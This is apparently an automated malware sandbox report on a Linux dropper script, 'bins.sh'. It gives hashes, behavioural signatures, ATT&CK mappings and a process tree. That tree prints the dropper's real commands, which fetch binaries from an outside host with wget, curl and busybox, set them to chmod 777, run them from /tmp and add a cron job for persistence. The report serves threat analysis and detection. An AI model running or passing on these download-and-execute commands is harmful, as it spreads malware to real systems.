Analysis
max time kernel: 149s
max time network: 153s
platform: debian-9_armhf
resource: debian9-armhf-20240611-en
resource tags: arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
submitted: 26/11/2024, 18:59
Static task: static1
Behavioral task: behavioral1
  Sample: bins.sh
  Resource: ubuntu1804-amd64-20240729-en
Behavioral task: behavioral2
  Sample: bins.sh
  Resource: debian9-armhf-20240611-en
Behavioral task: behavioral3
  Sample: bins.sh
  Resource: debian9-mipsbe-20240729-en
Behavioral task: behavioral4
  Sample: bins.sh
  Resource: debian9-mipsel-20240611-en
General
Target: bins.sh
Size: 10KB
MD5: b36e5f7a0413ffa61828f903f44a98cd
SHA1: 0ca86f60aa4fe5c5e0532a6cd3bd305cb5e43808
SHA256: 38995805906e9f6f21572c75e0693f153afbd175ee83c7a53970f66e21f713b4
SHA512: 6cd765121418db3017cf4e9ac35f6334b2fc669b53293005a6ee720adbafadab1072473923208647967e21e5ccdd7a8b365df453b05f19c6304ca66a1ca01a48
SSDEEP: 96:YDnD7DM1f1ELBC5mBWLKCf39393afjUIExzoTvqm6yN2mQEL7Xs7L7XsG2zQMF3q:t6F04WW0zjEQr9OzsER204t
Malware Config
Signatures
- Contacts a large (2083) amount of remote hosts [1 TTPs]
  This may indicate a network scan to discover remotely running services.
- Creates a large amount of network flows [1 TTPs]
  This may indicate a network scan to discover remotely running services.
- File and Directory Permissions Modification [1 TTPs, 5 IoCs]
  Adversaries may modify file or directory permissions to evade defenses.
  pid  Process
  797  chmod
  809  chmod
  678  chmod
  785  chmod
  791  chmod
- Executes dropped EXE [1 IoCs]
  ioc                                      pid  Process
  /tmp/8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb  679  8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb
- Renames itself [1 IoCs]
  pid  Process
  680  8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb
- Creates/modifies Cron job [1 TTPs, 1 IoCs]
  Cron allows running tasks on a schedule, and is commonly used for malware persistence.
  description                   ioc                                  Process
  File opened for modification  /var/spool/cron/crontabs/tmp.raA4QP  crontab
- Enumerates running processes
  Discovers information about currently running processes on the system.
- Checks CPU configuration [1 TTPs, 1 IoCs]
  Checks CPU information which indicates whether the system is a virtual machine.
  description              ioc            Process
  File opened for reading  /proc/cpuinfo  curl
- Reads runtime system information
  description              ioc                  Process
  File opened for reading  /proc/filesystems    crontab
  File opened for reading  /proc/<pid>/cmdline  8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb
  (one row per pid, in the order reported: 691, 727, 862, 994, 41, 146, 845, 852, 957, 967, 720, 731, 849, 759, 814, 894, 927, 929, 42, 735, 756, 771, 870, 875, 1031, 1035, 749, 742, 751, 797, 941, 1037, 15, 299, 900, 1049, 938, 940, 1007, 1024, 1026, 698, 896, 869, 933, 983, 1051, 747, 855, 737, 859, 1028, 1032, 19, 599, 854, 915, 932, 945, 988, 1039, 95, 740)
- System Network Configuration Discovery [1 TTPs, 16 IoCs]
  Adversaries may gather information about the network configuration of a system.
  pid  Process
  677  busybox
  691  curl
  776  busybox
  802  curl
  813  wget
  659  curl
  789  curl
  790  busybox
  794  wget
  690  wget
  800  wget
  808  busybox
  654  wget
  788  wget
  795  curl
  796  busybox
- Writes file to tmp directory [1 IoCs]
  Malware often drops required files in the /tmp directory.
  description                   ioc                                      Process
  File opened for modification  /tmp/8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb  curl
Processes
(path  command line  PID; children are indented under their parent, triggered signatures listed as "- ...")
/tmp/bins.sh  /tmp/bins.sh  (PID 645)
  /bin/rm  /bin/rm bins.sh  (PID 647)
  /usr/bin/wget  wget http://conn.masjesu.zip/bins/8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb  (PID 654)
    - System Network Configuration Discovery
  /usr/bin/curl  curl -O http://conn.masjesu.zip/bins/8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb  (PID 659)
    - Checks CPU configuration
    - System Network Configuration Discovery
    - Writes file to tmp directory
  /bin/busybox  /bin/busybox wget http://conn.masjesu.zip/bins/8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb  (PID 677)
    - System Network Configuration Discovery
  /bin/chmod  chmod 777 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb  (PID 678)
    - File and Directory Permissions Modification
  /tmp/8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb  ./8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb  (PID 679)
    - Executes dropped EXE
    - Renames itself
    - Reads runtime system information
    /bin/sh  sh -c "crontab -l"  (PID 681)
      /usr/bin/crontab  crontab -l  (PID 682)
    /bin/sh  sh -c "crontab -"  (PID 684)
      /usr/bin/crontab  crontab -  (PID 685)
        - Creates/modifies Cron job
        - Reads runtime system information
  /bin/rm  rm 8QkaWOmI92wUgRGoVPys4qDitpTUQbI2zb  (PID 687)
  /usr/bin/wget  wget http://conn.masjesu.zip/bins/GGcp0PJ0qZvRjEpnxP1NJw0ypACG78sETY  (PID 690)
    - System Network Configuration Discovery
  /usr/bin/curl  curl -O http://conn.masjesu.zip/bins/GGcp0PJ0qZvRjEpnxP1NJw0ypACG78sETY  (PID 691)
    - System Network Configuration Discovery
  /bin/busybox  /bin/busybox wget http://conn.masjesu.zip/bins/GGcp0PJ0qZvRjEpnxP1NJw0ypACG78sETY  (PID 776)
    - System Network Configuration Discovery
  /bin/chmod  chmod 777 GGcp0PJ0qZvRjEpnxP1NJw0ypACG78sETY  (PID 785)
    - File and Directory Permissions Modification
  /tmp/GGcp0PJ0qZvRjEpnxP1NJw0ypACG78sETY  ./GGcp0PJ0qZvRjEpnxP1NJw0ypACG78sETY  (PID 786)
  /bin/rm  rm GGcp0PJ0qZvRjEpnxP1NJw0ypACG78sETY  (PID 787)
  /usr/bin/wget  wget http://conn.masjesu.zip/bins/eKwD5dpTd7Y0aXghuCOXggGp5hirLG3OwQ  (PID 788)
    - System Network Configuration Discovery
  /usr/bin/curl  curl -O http://conn.masjesu.zip/bins/eKwD5dpTd7Y0aXghuCOXggGp5hirLG3OwQ  (PID 789)
    - System Network Configuration Discovery
  /bin/busybox  /bin/busybox wget http://conn.masjesu.zip/bins/eKwD5dpTd7Y0aXghuCOXggGp5hirLG3OwQ  (PID 790)
    - System Network Configuration Discovery
  /bin/chmod  chmod 777 eKwD5dpTd7Y0aXghuCOXggGp5hirLG3OwQ  (PID 791)
    - File and Directory Permissions Modification
  /tmp/eKwD5dpTd7Y0aXghuCOXggGp5hirLG3OwQ  ./eKwD5dpTd7Y0aXghuCOXggGp5hirLG3OwQ  (PID 792)
  /bin/rm  rm eKwD5dpTd7Y0aXghuCOXggGp5hirLG3OwQ  (PID 793)
  /usr/bin/wget  wget http://conn.masjesu.zip/bins/wzKo9O5QOEysb0D8DnrYo4sj61fpj3MrLo  (PID 794)
    - System Network Configuration Discovery
  /usr/bin/curl  curl -O http://conn.masjesu.zip/bins/wzKo9O5QOEysb0D8DnrYo4sj61fpj3MrLo  (PID 795)
    - System Network Configuration Discovery
  /bin/busybox  /bin/busybox wget http://conn.masjesu.zip/bins/wzKo9O5QOEysb0D8DnrYo4sj61fpj3MrLo  (PID 796)
    - System Network Configuration Discovery
  /bin/chmod  chmod 777 wzKo9O5QOEysb0D8DnrYo4sj61fpj3MrLo  (PID 797)
    - File and Directory Permissions Modification
  /tmp/wzKo9O5QOEysb0D8DnrYo4sj61fpj3MrLo  ./wzKo9O5QOEysb0D8DnrYo4sj61fpj3MrLo  (PID 798)
  /bin/rm  rm wzKo9O5QOEysb0D8DnrYo4sj61fpj3MrLo  (PID 799)
  /usr/bin/wget  wget http://conn.masjesu.zip/bins/40Nv4EfSYZ90kl24S0WvvlyrGXWtQC2EJf  (PID 800)
    - System Network Configuration Discovery
  /usr/bin/curl  curl -O http://conn.masjesu.zip/bins/40Nv4EfSYZ90kl24S0WvvlyrGXWtQC2EJf  (PID 802)
    - System Network Configuration Discovery
  /bin/busybox  /bin/busybox wget http://conn.masjesu.zip/bins/40Nv4EfSYZ90kl24S0WvvlyrGXWtQC2EJf  (PID 808)
    - System Network Configuration Discovery
  /bin/chmod  chmod 777 40Nv4EfSYZ90kl24S0WvvlyrGXWtQC2EJf  (PID 809)
    - File and Directory Permissions Modification
  /tmp/40Nv4EfSYZ90kl24S0WvvlyrGXWtQC2EJf  ./40Nv4EfSYZ90kl24S0WvvlyrGXWtQC2EJf  (PID 811)
  /bin/rm  rm 40Nv4EfSYZ90kl24S0WvvlyrGXWtQC2EJf  (PID 812)
  /usr/bin/wget  wget http://conn.masjesu.zip/bins/6h6MVlCJshDxmomNotsocz6RjWoYOJBihC  (PID 813)
    - System Network Configuration Discovery
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
  File and Directory Permissions Modification (1)
    Linux and Mac File and Directory Permissions Modification (1)
  Virtualization/Sandbox Evasion (1)
    System Checks (1)
Downloads
- Filesize: 177KB
  MD5: 786d75a158fe731feca3880f436082c0
  SHA1: 79ea2734e43d00cdeabed5586b2c1994d02aef3e
  SHA256: 5fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18
  SHA512: 7984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f
- Filesize: 210B
  MD5: c4a081a63dcc5ebce2f26b66f0ea672b
  SHA1: c10493b606407890addb547db4a4c1fe1875c59a
  SHA256: be05433ca7dbde044d339a4ed4bbcf187ff527dd8931b236cbf5ed6043754885
  SHA512: 4b0ba16ba46f1690b87f279413bbaa71191839c6d866c447c3826c25ee4a9c721499874ffd326133612cb113a3fcd40669256c8d8ad3fb324b383c4a0d9b1076